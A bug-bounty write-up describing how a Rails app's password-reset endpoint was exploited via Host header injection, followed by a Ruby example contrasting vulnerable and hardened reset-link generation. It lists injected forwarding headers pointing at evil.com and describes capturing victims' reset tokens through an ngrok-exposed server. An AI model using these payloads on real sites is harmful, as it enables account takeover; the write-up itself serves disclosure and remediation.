Pwn Them All #BugBounty

Bilal Khan
Sep 11, 2019

Recently I was pentesting a private program. The web app was built on Ruby on Rails, and I was testing the "forgot password" functionality (of course, why not?).

I was surprised to find that the endpoint was vulnerable to Host header injection, so here are the steps I took to exploit it. First I started a local Python HTTP server on port 8080, along with ngrok on port 80, so that any link pointing at my host would be logged by the Python server.

(Screenshot: Python server with ngrok)

I fired up Burp and Firefox, typed the URL again to capture the request for further testing, and entered my email in the forgot-password form. When I intercepted the request, I first tried every candidate header:

X-Host: evil.com
X-Server: evil.com
X-Forwarded-For: evil.com
X-Forwarded-Host: evil.com
(Screenshot: password reset form)
(Screenshot: captured request)

I tried each header in turn, and the one that worked for me was

X-Forwarded-Host: evil.com
(Screenshot: confirmation)

I got confirmation that the reset email had been sent to my address.

(Screenshot: the host in the reset link changed to my host)

The original host in the reset link was replaced by the evil host (my ngrok host), which means the application built the link from the request's forwarded host rather than from a fixed, configured hostname. Now when a victim clicks the link, I receive a GET request on my server carrying that user's password reset token, which can then be replayed against the real host to set a new password.

(Screenshot: victim clicks the link and the token is sent to my server)
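To make the root cause concrete, here is an added example (not code from the original post or from the target application) that models how a Rails app ends up putting an attacker-controlled host into its password reset link, next to a hardened version that never consults the request. The env keys use Rack's CGI-style naming (HTTP_X_FORWARDED_HOST, HTTP_HOST), and the precedence logic is restated from Rack 2's Rack::Request#host_with_port (X-Forwarded-Host wins over Host) so the file runs without the rack gem. The hostnames, the Devise-style reset path, and the token are assumptions for illustration.

```ruby
# Added example, not code from the original post. Models a Rack/Rails app that
# builds its password-reset link from request headers (vulnerable) versus one
# that uses a fixed canonical host (hardened). Hostnames, path and token are
# made up for illustration.
require "uri"

CANONICAL_HOST = "app.example.com" # assumed real hostname of the target app
TRUSTED_HOSTS  = [CANONICAL_HOST].freeze

# Effective host as Rack 2's Rack::Request#host_with_port resolves it:
# X-Forwarded-Host (last hop of a comma-separated chain) beats Host.
# Restated here so the example runs without the rack gem.
def request_host(env)
  forwarded = env["HTTP_X_FORWARDED_HOST"]
  if forwarded && !forwarded.empty?
    forwarded.split(/,\s?/).last
  else
    env["HTTP_HOST"] || env["SERVER_NAME"]
  end
end

# Vulnerable: the link host is whatever the inbound headers say, so an injected
# X-Forwarded-Host: evil.com lands in the email sent to the victim.
def reset_link_vulnerable(env, token)
  "https://#{request_host(env)}/users/password/edit?reset_password_token=#{token}"
end

# Hardened: the reset link is built from a configured host and never from the
# request. In Rails this is what config.action_mailer.default_url_options
# (host: ...) achieves for mailer-generated URLs.
def reset_link_hardened(token)
  URI::HTTPS.build(
    host:  CANONICAL_HOST,
    path:  "/users/password/edit",
    query: "reset_password_token=#{URI.encode_www_form_component(token)}"
  ).to_s
end

# Defence in depth: reject any request whose effective host is not allowlisted.
# Rails 6+ does the equivalent with config.hosts (ActionDispatch::HostAuthorization).
def trusted_host?(env)
  TRUSTED_HOSTS.include?(request_host(env))
end

# Constructed request modelled on the one captured in the post: legitimate
# Host header, injected X-Forwarded-Host.
CAPTURED_ENV = {
  "REQUEST_METHOD"        => "POST",
  "PATH_INFO"             => "/users/password",
  "HTTP_HOST"             => CANONICAL_HOST,
  "HTTP_X_FORWARDED_HOST" => "evil.com",
}.freeze

if $PROGRAM_NAME == __FILE__
  token = "abc123" # made-up token
  puts "vulnerable link: #{reset_link_vulnerable(CAPTURED_ENV, token)}"
  puts "hardened link:   #{reset_link_hardened(token)}"
  puts "host trusted?:   #{trusted_host?(CAPTURED_ENV)}"
end
```

The practical check is the one the post performs: submit the forgot-password form once with a plain request and once with `X-Forwarded-Host: <your host>`, then compare the host in the two emails. If they differ, the mailer is deriving its host from the request. The fix is to pin the mailer host in configuration and, on Rails 6 and later, to set `config.hosts` so requests with an unexpected effective host are rejected before they reach the controller.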
